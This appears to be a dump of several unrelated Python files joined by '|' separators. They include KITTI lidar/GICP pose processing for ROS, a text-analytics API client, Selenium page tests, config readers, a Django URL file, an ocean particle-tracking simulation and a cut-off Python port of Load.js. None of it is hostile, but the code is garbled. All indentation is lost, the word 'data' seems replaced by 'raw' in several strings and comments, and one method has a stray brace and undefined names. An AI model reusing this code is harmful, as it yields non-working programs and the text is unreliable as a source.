pitch = T_imu_to_velo_Euler_rotaiton[1]
yaw = T_imu_to_velo_Euler_rotaiton[2]
T_imu_to_velo_homo = np.empty([4,4],dtype=float)
T_imu_to_velo_homo = [[math.cos(yaw)*math.cos(pitch),
-math.cos(yaw)*math.sin(pitch)*math.sin(roll)+math.sin(yaw)*math.cos(roll),
-math.cos(yaw)*math.sin(pitch)*math.cos(roll)-math.sin(yaw)*math.sin(roll),
-T_imu_to_velo_translation.x],
[-math.sin(yaw)*math.cos(pitch),
math.sin(yaw)*math.sin(pitch)*math.sin(roll)+math.cos(yaw)*math.cos(roll),
-math.sin(yaw)*math.sin(pitch)*math.cos(roll)+math.cos(yaw)*math.sin(roll),
-T_imu_to_velo_translation.y],
[math.sin(pitch),
-math.cos(pitch)*math.sin(roll),
math.cos(pitch)*math.cos(roll),
-T_imu_to_velo_translation.z],
[0, 0, 0, 1] ]
# print T_imu_to_velo_homo
sys.stdout.write("\r T_imu_to_velo obtained")
sys.stdout.flush()
# print (" T_imu_to_velo obtained")
# print
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# ---->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Obtain gicp results
sys.stdout.write("\r>>>Read GICP raw data")
sys.stdout.flush()
gicp_raw = np.loadtxt(gicp_output_dir)
gicp_row_length = np.shape(gicp_raw)[0]
pose_icp = [None] * number_of_frame
pose_icp[0] = np.matrix([[1,0,0,0],[0,1,0,0],[0,0,1,0],[0,0,0,1]])
pose_icp_incr = [None] * number_of_frame
pose_icp_incr[0] = np.matrix([[1,0,0,0],[0,1,0,0],[0,0,1,0],[0,0,0,1]])
i = 0
current_starting_row = 0
current_ending_row = 0
accumulate_tf = pose_icp[0]
for i in range(number_of_frame - 1):
current_starting_row = i * 4 + 0
current_ending_row = i * 4 + 3
current_pose_row_0 = gicp_raw[current_starting_row , :]
current_pose_row_1 = gicp_raw[current_starting_row + 1 , :]
current_pose_row_2 = gicp_raw[current_starting_row + 2 , :]
current_pose_row_3 = gicp_raw[current_starting_row + 3 , :]
current_pose = np.zeros(shape = (4,4))
current = np.matrix([current_pose_row_0,current_pose_row_1,current_pose_row_2,current_pose_row_3])
accumulate_tf = current.dot(accumulate_tf)
pose_icp[i+1] = accumulate_tf
pose_icp_incr[i+1] = current
# print current_starting_row
# print i
# ---->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# include Tr matrix
pose_icp_T = [None] * number_of_frame
pose_icp_incr_T = [None] * number_of_frame
for i in range(number_of_frame-1):
transfer_pose = np.empty((4,4,))
# print (T_imu_to_velo_homo)
# print
# print(pose[i])
transfer_pose = np.dot(T_imu_to_velo_homo, pose_icp[i])
transfer_pose_incr = np.dot(T_imu_to_velo_homo, pose_icp_incr[i])
pose_icp_T[i] = np.empty((4,4,))
pose_icp_T[i] = transfer_pose
pose_icp_incr_T[i] = np.empty((4,4,))
pose_icp_incr_T[i] = transfer_pose_incr
sys.stdout.write("\r Pose_GICP data obtained")
sys.stdout.flush()
# rospy.sleep(0.5) # Sleeps for 1 sec
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Read OXTS data
OXTS_GPS_raw = np.empty([1,3],dtype=float)
gcount = 1
sys.stdout.write("\r>>>Read OXTS GPS raw data")
sys.stdout.flush()
# print
# rospy.sleep(0.5) # Sleeps for 1 sec
for topic, msg, t in bag.read_messages("/kitti/oxts/gps/fix"):
# if gcount < 1:
# break
# gcount -= 1
current_GPS_data = [msg.latitude, msg.longitude, msg.altitude]
OXTS_GPS_raw = np.vstack([OXTS_GPS_raw , current_GPS_data])
OXTS_GPS_raw = np.delete(OXTS_GPS_raw, (0), axis=0)
sys.stdout.write("\r OSTX GPS raw data obtained")
# print
# print(OXTS_GPS_raw)
sys.stdout.write("\r>>>Read OXTS IMU data")
sys.stdout.flush()
# print
OXTS_IMU_raw = np.empty([1,3],dtype=float)
icount = 3
for topic, msg, t in bag.read_messages("/kitti/oxts/imu"):
# if icount < 1:
# break
# icount -= 1
# print msg
IMU_raw = msg.orientation
quaternion_IMU = (
IMU_raw.x,
IMU_raw.y,
IMU_raw.z,
IMU_raw.w)
IMU_data = tf.transformations.euler_from_quaternion(quaternion_IMU)
IMU_roll = IMU_data[0]
IMU_pitch = IMU_data[1]
IMU_heading = IMU_data[2]
OXTS_IMU_raw = np.vstack([OXTS_IMU_raw , [IMU_roll, IMU_pitch, IMU_heading]])
# print IMU_data
OXTS_IMU_raw = np.delete(OXTS_IMU_raw, (0), axis=0)
# print OXTS_IMU_raw
sys.stdout.write("\r OXTS_IMU data obtained")
sys.stdout.flush()
# print
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Calculate pose (loadOxtsliteData and convertOxtsToPose)
# compute scale from first lat value
oxts_first = OXTS_GPS_raw[0][0]
scale = math.cos (oxts_first * math.pi / 180.00)
# print scale
# OXTS_GPS_raw [1] [2] [3] and OXTS_IMU_raw [1] [2] [3]
oxts = np.concatenate ((OXTS_GPS_raw, OXTS_IMU_raw), axis = 1)
# print oxts
lengh_of_oxts = np.shape(oxts)[0]
# print lengh_of_oxts
pose_gps = [None] * lengh_of_oxts
Tr_0_inv = np.zeros(shape = (4,4))
isempty = np.zeros(shape = (4,4))
# a = oxts[0]
# print(a)
i = 0
for i in range(lengh_of_oxts-1):
if oxts[i] == []:
pose_gps[i] = np.empty((3,3,)) * np.nan
continue
t = np.empty((3,1,))
current_oxts_1 = oxts[i][0]
current_oxts_2 = oxts[i][1]
er = 6378137
current_t_11 = scale * current_oxts_2 * math.pi * er / 180
current_t_12 = scale * er * math.log(math.tan( (90+ current_oxts_1) * math.pi / 360 ))
current_t_13 = oxts[i][2]
t = [[current_t_11], [current_t_12], [current_t_13]]
# print t
# print
# print i
# print(oxts[i])
rx = oxts[i][3]
ry = oxts[i][4]
rz = oxts[i][5]
# print (rx)
# print (ry)
# print (rz)
Rx = np.matrix([[1, 0, 0], [0, math.cos(rx), -math.sin(rx)], [0, math.sin(rx), math.cos(rx)]])
Ry = np.matrix([[math.cos(ry), 0, math.sin(ry)], [0, 1, 0], [-math.sin(ry), 0, math.cos(ry)]])
Rz = np.matrix([[math.cos(rz), -math.sin(rz), 0], [math.sin(rz), math.cos(rz), 0], [0, 0, 1]])
R = np.empty((3,3,))
R = np.dot(np.dot(Rz,Ry),Rx)
# print (Rx)
# print (Ry)
# print (Rz)
# print R
# print
current_matrix = np.zeros(shape = (4,4))
first_three_row = np.concatenate ((R,t), axis =1)
current_matrix = np.vstack([first_three_row, [0,0,0,1]])
# print first_three_row
if np.array_equal(Tr_0_inv,isempty):
# print "enter if statement"
# print i
Tr_0_inv = inv(current_matrix)
# if i == 0:
# print Tr_0_inv
# print four_rows
current_pose = np.empty((4,4,))
current_pose = Tr_0_inv.dot(current_matrix)
pose_gps[i] = current_pose
# print i
# print oxts[i]
# print pose[i]
# raw_input("press ehnter to continue")
# ---->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# include Tr matrix
pose_gps_T = [None] * lengh_of_oxts
for i in range(lengh_of_oxts-1):
transfer_pose = np.empty((4,4,))
# print (T_imu_to_velo_homo)
# print
# print(pose[i])
transfer_pose = np.dot(T_imu_to_velo_homo, pose_gps[i])
pose_gps_T[i] = np.empty((4,4,))
pose_gps_T[i] = transfer_pose
sys.stdout.write("\r Pose_GPS data obtained")
sys.stdout.flush()
frame = 0
frame_count = 0
frame_counts = 0
total_frames = 0
frames_left = 0
skipped_count = 0
rejected_count = 0
# for frame in range(0,interval,len(pose_T)):
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Data summary:
# pose_icp_T - gicp pose data with Tr transform
# pose_icp_incr_T - incremental pose data
# pose_gps_T - gps pose data with Tr transform
# pose_T the original variable used, now it is modified
# pose_T should be the ekf pose result
# Compare data size
if len(pose_icp_T) < len(pose_gps_T):
frameNo = len(pose_icp_T)
else:
frameNo = len(pose_gps_T)
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Read velodyne info
sys.stdout.write("\r>>>Read Velodyne point data")
sys.stdout.flush()
print;print
# all_points = np.empty([1,3],dtype=float)
current_point_set = np.empty((999999,3,)) * np.NaN
vcount = 5
bag_count = -1
total_msg_no = 0
for topic, msg, t in bag.read_messages("/kitti/velo/pointcloud"):
# bag_count += 1
# if (bag_count) % interval != 0:
# continue
total_msg_no += 1
all_points = [np.empty([1,4],dtype=float)] * total_msg_no
for topic, msg, t in bag.read_messages("/kitti/velo/pointcloud"):
# transformed_points = np.empty((1,3,))
transformed_points = np.empty((999999,3,)) * np.NaN
bag_count += 1
# if (bag_count) % interval != 0:
# continue
# if vcount < 1:
# break
# vcount -= 1
# print("counting cycles")
# print vcount
frame_count += 1
total_frames = len(pose_icp_T) / interval
total_frames = math.ceil(total_frames)
frames_left = total_frames - frame_count + 1
info_of_frame = "Processing scan No.%d , %d remaining" % (frame_count,frames_left)
sys.stdout.write("\r%s" % info_of_frame)
sys.stdout.flush()
# sys.stdout.write(" ~~~~~~working hard >.< please wait!~~~~~~~")
# print
# print vcount
data_length = len(msg.data)
## msg is of type PointCloud2
raw_data = pc2.read_points(msg)
point_count_raw = 0
for point in raw_data:
current_point = [point[0], point[1], point[2]]
# if point[0] > 4:
try:
# print point_count_raw
# print current_point
current_point_set[point_count_raw] = current_point
point_count_raw += 1
except:
# print ".^. skip recording this point"
skipped_count += 1
continue
current_point_set = np.delete(current_point_set, (0), axis=0)
current_point_set = current_point_set[~np.isnan(current_point_set).any(axis=1)]
velo = current_point_set
if np.shape(velo)[0] < 2:
continue
j = 0
point_count = -1
for j in range(np.shape(velo)[0]):
try:
point_count += 1
if (point_count + 1 ) % density != 0:
continue
# print;print pose_ekf
pose_a = pose_icp_T[bag_count]
point = velo[j]
point_a = point[np.newaxis, :].T
# print point_a
point_b = np.vstack([point_a, [1]])
point_c = np.dot(pose_a, point_b)
point_c = point_c[np.newaxis, :].T
point_c = np.delete(point_c, [3], axis=1)
# print; print point_c
transformed_points[j] = point_c
except:
# print;print "except"
continue
transformed_points = transformed_points[~np.isnan(transformed_points).any(axis=1)]
# print; print transformed_points
try:
transformed_points = np.delete(transformed_points, (0), axis=0)
except:
continue
all_points[frame_count-1] = transformed_points
all_points[frame_count-1] = np.delete(all_points[frame_count-1], (0), axis=0)
# all_points = np.vstack([all_points, transformed_points])
# all_points = np.delete(all_points, (0), axis=0)
# print(all_points)
# a = all_points.shape
# print(a)
# print frame_count
sys.stdout.write("\rVelodyne point data processing finished")
sys.stdout.flush()
# bag.close()
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# ---->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# pose =
# subprocess.call(['spd-say','start publishing'])
# print all_points
# print
# print(">>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
# prsint(">>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
sys.stdout.write("\rProcessing completed, generating system report")
# print
# sys.stdout.flush()
# print
# a = type(all_points)
b = np.shape(all_points)
# print;print a
sys.stdout.write(" Total frames:")
print b[0]
sys.stdout.write(" Skipped points:")
print skipped_count
sys.stdout.write(" Rejected points:")
print rejected_count
print
# print
# print ("Start visualising...")
pcl_pub = rospy.Publisher("/gicp_visu", PointCloud2, queue_size = 10)
rospy.loginfo("Publisher started at: /gicp_visu")
rospy.sleep(1.)
rospy.loginfo("Publishing...")
print
print
print
bag.close()
current_visual_set = np.empty([1,3])
while (1):
raw_input("\r... waiting for instruction")
# sys.stdout.write("Start visualising...")
sys.stdout.flush()
current_visual_set = np.empty([1,3])
k = 0
for k in range(total_msg_no):
sys.stdout.write("\rVisualising frame %d" %k)
sys.stdout.flush()
header = std_msgs.msg.Header()
header.stamp = rospy.Time.now()
header.frame_id = 'map'
fields = [PointField('x', 0, PointField.FLOAT32, 1),
PointField('y', 4, PointField.FLOAT32, 1),
PointField('z', 8, PointField.FLOAT32, 1),
PointField('i', 12, PointField.FLOAT32, 1)]
try:
current_visual_set = np.concatenate((current_visual_set, all_points[k]))
# a = type(current_visual_set)
# print;print a
except:
continue
current_visual_set_list = current_visual_set.tolist()
# print all_points
processed_data = pc2.create_cloud_xyz32(header, current_visual_set_list)
rospy.sleep(duration)
# [[1, 1, 1]]
# a = [[1, 1, 1]]
# b = type(a)
# print b
pcl_pub.publish(processed_data)
sys.stdout.write("\rVisualisation complete")
sys.stdout.flush()
# print
# print
# def publish_odom(self,rtom_list):
if __name__ == '__main__':
os.system('cls' if os.name == 'nt' else 'clear')
try:
process()
except rospy.ROSInterruptException:
pass |
import requests
import os
import io
import json
import time
import configparser
def main():
# 1. Define raw directory, max length of the json message raw and the number of api units
# 2. For each json file in the directory
# 3. build single string of text
# 4. make sure its within the size limit
# 5. make sure we haven't hit our API limit
# 6. send text array to the vendor
# 7. create a results text file with the json and the text array
# 8. throttle so we don't exceed our rate limit
config = configparser.ConfigParser()
config.read('config.ini')
# 1. Define raw directory, max length of the json message raw and the number of api units
data_dir_name = config['DEFAULT']['DATA_DIR_NAME']
results_dir_name = config['DEFAULT']['RESULTS_DIR_NAME']
max_length = int(config['IDL']['IDL_MAX_LENGTH'])
api_units_left = int(config['IDL']['IDL_API_UNITS_LEFT']) # the starting number of units every day
max_requests_per_min = int(config['DEFAULT']['MAX_REQUESTS_PER_MIN'])
idl_api_key = config['IDL']['IDL_API_KEY']
# walk the directory
for root_dir_name, subdir_list, file_list in os.walk(data_dir_name):
base_dir_name = os.path.basename(root_dir_name)
if base_dir_name == data_dir_name:
continue
print('Processing directory: %s' % base_dir_name)
processed_file_count = 1
file_count = len(file_list)
# 2. For each json file in the directory
for filename in file_list:
print('Processing {}/{}'.format(processed_file_count, file_count))
processed_file_count += 1
if filename.endswith(('.json')):
filepath = os.path.join(data_dir_name, filename)
# 3. build single string of text
text = build_text(filepath)
# 4. make sure its within the size limit
truncated_text = truncate_text_to_limit(filepath, text, max_length)
# 5. make sure we haven't hit our API limit
if api_units_left <= 0:
print('API Units exhausted.')
exit(1)
# 6. send text array to the vendor
results = send_text_to_idl(idl_api_key, filepath, truncated_text)
api_units_left = results.json()['request']['units_left']
if results.status_code != requests.codes.ok:
print('Error processing: {}'.format(filepath))
print('Error: {}'.format(results.json()))
else:
# 7. create a results text file with the json and the text array
write_results_to_file(results_dir_name, filename, results.json(), text)
check_for_significant_interests(filename, results.json()['response'][0]['interests'])
# 8. throttle so we don't exceed our rate limit
time.sleep(60 / max_requests_per_min)
def build_text_list(filepath):
text_list = []
with open(filepath, 'r') as f:
datastore = json.load(f)
for message_item in datastore:
text_list.append(message_item['message'])
return text_list
def build_text(filepath):
text = ''
with open(filepath, 'r') as f:
datastore = json.load(f)
for message_item in datastore:
text += message_item['message']
return text
def truncate_text_to_limit(filepath, text, max_length):
if utf8len(text) > max_length:
print("Truncating: {}".format(filepath))
text = text[:max_length]
return text
def utf8len(s):
return len(s.encode('utf-8'))
def send_text_to_idl(idl_api_key, filepath, text):
payload = {'apikey': idl_api_key, 'models': 'interests'}
data = {'texts': [text]}
r = requests.post('https://api.indatalabs.com/v1/text', params=payload, json=data)
return r
def write_results_to_file(results_dir_name, filename, result_json, text):
result_filepath = results_dir_name + '/' + filename + '.results.txt'
with io.open(result_filepath, 'w+', encoding='UTF-8') as f:
f.write('API RESPONSE:\n')
json.dump(result_json, f, sort_keys=True, indent=4, ensure_ascii=False)
f.write('\nMESSAGE CONTENT:\n')
f.write(text)
def check_for_significant_interests(filename, interests):
significant_interests = []
try:
for k, v in interests.items():
if v >= 1.0:
significant_interests.append([k, v])
if len(significant_interests) > 0:
print('{} has significant interests: {}'.format(filename, significant_interests))
except Exception:
pass
def test_call_to_idl(idl_api_key):
# make a call to:
# https://api.indatalabs.com/v1/text
payload = {'apikey': idl_api_key, 'models': 'interests'}
data = {
"texts": [
"Regardless of the industry, Data Science and Artificial Intelligence promise to reshape the way we do our jobs every day. At InData Labs we seek to bring the power of raw science & AI to our customers.",
"Whether you want to explore the possible use cases for big raw analytics or have an AI solution in mind and want to start quickly, our team of world-class raw scientists and raw engineers can help you achieve big raw success and get the most out of your investment."
]
}
r = requests.post('https://api.indatalabs.com/v1/text', params=payload, json=data)
print(r.url)
print(r.json())
if __name__ == '__main__':
main()
|
from zoom.component import DynamicComponent
class ProgressWidget(DynamicComponent):
"""ProgressWidget
>>> progress = ProgressWidget()
>>> component = progress.format(
... title='Widget Title',
... hint='Widget hint',
... percent=75,
... color='blue',
... )
"""
def format(
self,
percent,
title='value title',
hint='',
color='#337ab7',
):
return DynamicComponent.format(
self,
percent=percent,
title=title,
hint=hint,
color=color,
)
|
import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options
class EdurekaOrg(unittest.TestCase):
def setUp(self):
options = Options();
options.headless = True;
self.driver = webdriver.Firefox(options=options, executable_path="/usr/local/bin/geckodriver");
def test_search_title(self):
driver = self.driver
driver.get("http://34.67.113.188:30753/")
title = driver.find_element(By.TAG_NAME, "h2")
# Looking for the string "simple" in the heading
self.assertIn("Simple", title.text)
def test_search_heading(self):
driver = self.driver
driver.get("http://34.67.113.188:30753/")
heading = driver.find_element(By.TAG_NAME, "h3")
self.assertIn("Home", heading.text)
def test_about_page(self):
driver = self.driver
driver.get("http://34.67.113.188:30753/")
driver.find_element(By.ID, "About Us").click()
about = driver.find_element(By.TAG_NAME, "b")
self.assertIn("about", about.text)
def test_product_page(self):
driver = self.driver
driver.get("http://34.67.113.188:30753/")
driver.find_element(By.ID, "Products").click()
product = driver.find_element(By.TAG_NAME, "b")
self.assertIn("product", product.text)
def test_contact_page(self):
driver = self.driver
driver.get("http://34.67.113.188:30753/")
driver.find_element(By.ID, "Contact").click()
contact = driver.find_element(By.TAG_NAME, "b")
self.assertIn("contact", contact.text)
def tearDown(self):
self.driver.close()
if __name__ == "__main__":
unittest.main();
|
#-*- encoding: gb2312 -*-
import ConfigParser
import string, os, sys
import datetime
import time
class HbcIni:
def __init__(self,confpath = 'hbc.conf'):
self.confpath = confpath
self.cf = ConfigParser.ConfigParser()
self.cf.read(self.confpath)
def str2time(self,timestr):
t = time.strptime(timestr,'%Y-%m-%d %H:%M:%S')
return datetime.datetime(*t[:6])
def getKakou(self):
kakouconf = {}
kakouconf['host'] = self.cf.get('KAKOU','host')
kakouconf['user'] = self.cf.get('KAKOU','user')
kakouconf['passwd'] = self.cf.get('KAKOU','passwd')
kakouconf['port'] = self.cf.get('KAKOU','port')
kakouconf['sid'] = self.cf.get('KAKOU','sid')
return kakouconf
def getHbc(self):
hbcconf = {}
hbcconf['host'] = self.cf.get('HBC','host')
hbcconf['user'] = self.cf.get('HBC','user')
hbcconf['passwd'] = self.cf.get('HBC','passwd')
hbcconf['port'] = self.cf.get('HBC','port')
hbcconf['sid'] = self.cf.get('HBC','sid')
return hbcconf
def getMysql(self):
mysqlconf = {}
mysqlconf['host'] = self.cf.get('MYSQLSET','host')
mysqlconf['user'] = self.cf.get('MYSQLSET','user')
mysqlconf['passwd'] = self.cf.get('MYSQLSET','passwd')
mysqlconf['port'] = self.cf.getint('MYSQLSET','port')
mysqlconf['db'] = self.cf.get('MYSQLSET','db')
mysqlconf['charset'] = self.cf.get('MYSQLSET','charset')
return mysqlconf
def getSyst(self):
systconf = {}
systconf['time'] = self.str2time(self.cf.get('SYSTSET','time'))
systconf['imgpath'] = self.cf.get('SYSTSET','imgpath')
return systconf
def setSyst(self,c_time):
self.cf.set('SYSTSET', 'time', c_time)
fh = open(self.confpath, 'w')
self.cf.write(fh)
fh.close()
if __name__ == "__main__":
try:
hbcini = HbcIni()
print hbcini.getSyst()
#s = imgIni.getPlateInfo(PATH2)
except ConfigParser.NoOptionError,e:
print e
time.sleep(10)
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Time : 2018/10/21 21:13
# @Author : Administrator
# @Site :
# @File : Python练习实例71.py
# @Software: PyCharm
"""
题目:
编写input()和output()函数输入,输出5个学生的数据记录。
-----------------------------------------------------
思路:
-----------------------------------------------------
"""
N = 5
stu = [['', '', []] for i in range(N)]
def stu_input(stu):
for i in range(N):
stu[i][0] = raw_input("input student's num:")
stu[i][1] = raw_input("input student's name:")
for j in range(3):
stu[i][2].append(input("input student's score:"))
def stu_output(stu):
for i in range(N):
print "num:(%s) name(%s)" % (stu[i][0], stu[i][1])
for j in range(3):
print "score %d: %d" % (j + 1, stu[i][2][j])
if __name__ == '__main__':
stu_input(stu)
print stu
stu_output(stu)
|
#!/usr/bin/python
#coding:utf-8
from django.conf.urls import url
from . import searchroute as route
urlpatterns = [
url(r'^$', route.indexpage, name='search'),
url(r'^searchmain/$', route.mainpage, name='searchmain'),
url(r'^searchdetail/$', route.detailpage, name='searchdetail'),
] |
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 13 15:31:22 2017
@author: nooteboom
"""
from parcels import (ParticleSet, JITParticle, AdvectionRK4_3D,
ErrorCode, ParticleFile, Variable, Field)
from datetime import timedelta as delta
from datetime import datetime
import numpy as np
from glob import glob
import sys
import setfieldsets as setf
import popkernels as popk
dirread_top = '/projects/0/topios/hydrodynamic_data/NEMO-MEDUSA/ORCA0083-N006/'
dirread_pop = '/projects/0/palaeo-parcels/POP/POPdata/'
sp = 6. #The sinkspeed m/day
dd = 10. #The dwelling depth
res = 1 #resolution in degrees
Cs = float(sys.argv[1]) #Diffusion paramete
gmbol = False # Put to true for GM parameterisation/bolus speed
posidx = int(sys.argv[2]) #ID of the file to define latitude and longitude ranges
dirwrite = '/projects/0/palaeo-parcels/POP/POPres/particlefiles/sp%d_dd%d/'%(int(sp),int(dd))
# determine the release grid and the indices to load
if(posidx==1):
lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(-79, -62)+0.5)
ind = {'lat':range(0, 83)}
elif(posidx==2):
lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(-62, -45)+0.5)
ind = {'lat':range(0, 120)}
elif(posidx==3):
lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(-45, -27)+0.5)
ind = {'lat':range(33, 140)}
elif(posidx==4):
lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(-27, -9)+0.5)
ind = {'lat':range(70, 200)}
elif(posidx==5):
lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(-9, 9)+0.5)
ind = {'lat':range(90, 300)}
elif(posidx==6):
lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(9, 27)+0.5)
ind = {'lat':range(170, 320)}
elif(posidx==7):
lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(27, 45)+0.5)
ind = {'lat':range(220, 350)}
elif(posidx==8):
lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(45, 62)+0.5)
ind = {'lat':range(270, 384)}
elif(posidx==9):
lons, lats = np.meshgrid(np.arange(0,360)+0.5,np.arange(62, 71)+0.5)
ind = {'lat':range(300, 384)}
# reshape longitudes and latitudes
lons = lons.flatten(); lats = lats.flatten();
lonsz = []; latsz = [];
lons[lons>320.01] -= 360
# Delete the particles on land
bathy = Field.from_netcdf([dirread_pop+'bathymetry_POP_lowres_320t384.nc'], 'Bathymetry',
{'lon':'ULONG','lat':'ULAT'}, interp_method='bgrid_tracer')
grid = bathy.grid
grid.add_periodic_halo(zonal=True, meridional=False, halosize=20)
bathy.grid = grid
bathy.add_periodic_halo(zonal=True, meridional=False, halosize=20)
for i in range(lons.shape[0]):
if(bathy[0,0,lats[i], lons[i]]>0):
lonsz.append(lons[i])
latsz.append(lats[i])
# The boundary of the grid is at 320 degrees
lonsz = np.array(lonsz); latsz = np.array(latsz);
lonsz[lonsz>320.01] -= 360
if(not lonsz.size):
sys.exit("Only land in the run with this idx %d"%(posidx))
dep = dd * np.ones(latsz.shape)
times = np.array([datetime(2004, 12, 30) - delta(days=x) for x in range(0,int(365*4),3)])[:140]
time = np.empty(shape=(0));lons = np.empty(shape=(0));lats = np.empty(shape=(0));
for i in range(len(times)):
lons = np.append(lons,lonsz)
lats = np.append(lats, latsz)
time = np.append(time, np.full(len(lonsz),times[i]))
def run_corefootprintparticles(dirwrite,outfile,lonss,latss,dep):
files = sorted(glob(dirread_pop+'control_PD_1egree_extra_BOLUS/tavg/t.*'))
dfile = [dirread_pop+'control_PD_1egree/t.x1_SAMOC_flux.160001.interp.nc']
bfile = [dirread_pop+'bathymetry_POP_lowres_320t384.nc']
dimfile = [dirread_pop+'coordinates_curvilinear_pop_grid_320x384.nc']
afile = [dirread_pop+'spinup_B_2000_cam5_f09_g16.pop.h.1000-01.nc']
if(gmbol):
fieldset = setf.set_pop_fieldset_bolus(files, dimfile, dfile, bfile,afile, indices = ind)
else:
fieldset = setf.set_pop_fieldset(files, dimfile, dfile, bfile, afile, indices = ind)
fieldset.add_periodic_halo(zonal=True, halosize=20)
fieldset.add_constant('dwellingdepth', np.float(dd))
fieldset.add_constant('sinkspeed', sp/86400.)
fieldset.add_constant('maxage', 300000.*86400)
fieldset.add_constant('surface', 5.00622)
fieldset.add_constant('gmbol', gmbol)
fieldset.add_constant('Cs', Cs)
class DinoParticle(JITParticle):
temp = Variable('temp', dtype=np.float32, initial=np.nan)
age = Variable('age', dtype=np.float32, initial=0.)
salin = Variable('salin', dtype=np.float32, initial=np.nan)
lon0 = Variable('lon0', dtype=np.float32, initial=0.)
lat0 = Variable('lat0', dtype=np.float32, initial=0.)
depth0 = Variable('depth0',dtype=np.float32, initial=0.)
beached = Variable('beached',dtype=np.float32, initial=0.)
pset = ParticleSet.from_list(fieldset=fieldset, pclass=DinoParticle, lon=lonss.tolist(), lat=latss.tolist(),
time = time)
pfile = ParticleFile(dirwrite + outfile, pset, write_ondelete=True)
if(gmbol):
advectionkernel = pset.Kernel(popk.AdvectionRK4_3D_addbolus)
if(Cs>0):
advectionkernel += popk.smagorinsky_bolus
else:
advectionkernel = pset.Kernel(AdvectionRK4_3D)
if(Cs>0):
advectionkernel += popk.smagorinsky
kernels = pset.Kernel(popk.initials) + popk.Sink + advectionkernel + popk.Age + popk.periodicBC
pset.execute(kernels, runtime=delta(days=5*365), dt=delta(minutes=-15), output_file=pfile, verbose_progress=False, recovery={ErrorCode.ErrorOutOfBounds: popk.DeleteParticle})
print('Execution finished')
if(gmbol):
outfile = "grid_smagorinskiwn_gm_Cs"+str(Cs)+"_id"+str(posidx)+'_dd'+str(int(dd)) +'_sp'+str(int(sp))+"_res"+str(res)
else:
outfile = "grid_smagorinskiwn_Cs"+str(Cs)+"_id"+str(posidx)+'_dd'+str(int(dd)) +'_sp'+str(int(sp))+"_res"+str(res)
run_corefootprintparticles(dirwrite,outfile,lons,lats,dep)
|
#!/usr/bin/python
""" A Python implementation of Load.js.
See Load.js's documentation for more details on what many of the properties do, as well as how the system works. This
module provides many methods of that package in Python with the same names and signatures.
"""
import os
from os import path
from sys import stderr
import re
import json
from six import string_types
class LoadHandler(object):
""" Override this class to change how the LoadState works """
def load_file(self, state, file, packs, type):
state.printMsg("Loading file "+file)
for p in packs:
state.provide(p, type)
""" Evaluate a single package """
def evaluate(self, state, pack, type):
state.printMsg("Evaluating "+pack)
for p in state.getDependencies(pack):
state.require(p)
state.printMsg("Done evaluating "+pack)
class LoadState(object):
STATE_NONE = 0
STATE_SEEN = 1
STATE_IMPORTING = 2
STATE_IMPORTED = 3
STATE_RUNNING = 4
STATE_RAN = 5
TYPE_PACK = 0
TYPE_RES = 1
TYPE_EXT = 2
TYPE_BINRES = 3
def __init__(self, handler=None, noisy=False):
self._packs = {}
self._files = {}
self._importSet = set()
self._depFiles = {}
self._currentEval = None
self._noisy = noisy
self._defered = []
self._importStack = []
if handler:
self._handler = handler
else:
self._handler = LoadHandler()
def printMsg(self, msg):
if self._noisy:
print(msg);
def provide(self, name, type):
self.printMsg("Provided "+name)
if name in self._packs:
if self._packs[name]["state"] >= LoadState.STATE_IMPORTING:
self._packs[name]["state"] = LoadState.STATE_IMPORTED
else:
self._packs[name]["state"] = LoadState.STATE_SEEN
else:
self._packs[name] = {
"file":"about:blank",
"state":LoadState.STATE_SEEN,
"deps":[],
"size":0,
"type":type,
"evalOnImport":False
}
if self._packs[name]["state"] == LoadState.STATE_SEEN:
return
self._tryImport()
def require(self, name):
defer = name.startswith(">")
ret = None
if defer:
name = name[1:]
if not defer: self._importStack.append(name)
if not defer and self._packs[name].state == STATE_RUNNING:
stderr.writeln("Unsatisfiable dependence with {}, require chain has loops. ({})"
.format(name, " > ".join(_importStack)))
}
if name in self._packs:
if not defer:
ret = self.evaluate(name)
else:
self._defered.append(name)
if not defer: self._importStack.pop()
if len(self._importStack) == 0 and self._defered:
self.require(self._defered.pop())
return ret;
def evaluate(self, name):
if self._packs[name]["state"] == LoadState.STATE_RUNNING:
return
if self._packs[name]["state"] == LoadState.STATE_IMPORTED:
oldCur = self._currentEval
self._currentEval = name
self._packs[name]["state"] = LoadState.STATE_RUNNING
self._handler.evaluate(self, name, self._packs[name]["type"])
self._packs[name]["state"] = LoadState.STATE_RAN
self._currentEval = oldCur
def importPack(self, name):
if not self.isImported(name):
oldName = name
if name.startswith(">"):
name = name[1:]
self._addToImportSet(oldName)
self._tryImport()
def _addToImportSet(self, pack):
if pack in self._importSet:
return
if self._packs[pack]["state"] >= LoadState.STATE_IMPORTING:
return
self._importSet.add(pack)
p = self._packs[pack]
for d in p["deps"]:
